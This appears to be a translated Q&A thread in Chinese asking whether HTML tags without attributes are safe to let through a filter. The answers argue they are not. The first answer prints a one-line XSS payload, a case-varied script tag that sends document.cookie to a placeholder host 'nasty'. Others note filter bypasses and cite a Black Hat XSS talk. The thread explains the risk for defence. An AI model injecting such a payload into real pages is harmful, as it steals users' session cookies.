如果HTML标签没有属性,那么它们是否安全?
答案 0 :(得分:5)
没有
<ScrIPT>(new Image).src = 'http://nasty/log?s=' + document.cookie;</SCRipT>
答案 1 :(得分:2)
&lt; script&gt;怎么样?和&lt; style&gt;,在大多数浏览器中,它们也可以在没有属性的情况下工作。或者,如果他们没有关闭特定标签,它也可能会弄乱页面..只需打开一个&lt; strong&gt;或者其他什么都是大胆的例子。
答案 2 :(得分:2)
我的立场是......你怎么发现他们没有属性?可以生成在浏览器中执行Javascript的特殊HTML代码,并绕过过滤器检查属性。
查看此演示文稿http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf
无论如何,如果你想要一个是/否答案我的不是:)